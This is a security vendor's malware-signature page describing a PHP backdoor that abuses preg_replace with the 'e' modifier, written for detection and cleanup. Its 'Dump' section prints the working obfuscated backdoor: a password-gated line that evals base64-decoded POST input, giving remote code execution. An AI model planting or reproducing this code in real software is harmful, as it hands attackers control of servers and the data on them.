Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.pregreplace.009

php.backdoor.pregreplace.009

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

preg_replace() function is another possibility for executing the code. When used with "e" modifier, the code it processes is also executed which gives the malware authors possibility of deobfuscating and directly running their code in one step. It's widely used despite the "e" modifier is deprecated.

Affecting

Any sites on servers with enabled PHP

Cleanup

You can sign up with us and let our team remove the malware for you.

Dump

if(@md5($_POST['u'.'pw'])=='c89be6715547152166700ff52ba56fb0')
preg_replace("|w|e",'ev'.'al(ba'.'se64'.'_dec'.'ode($_'.'PO'.'ST["c"]));',"w");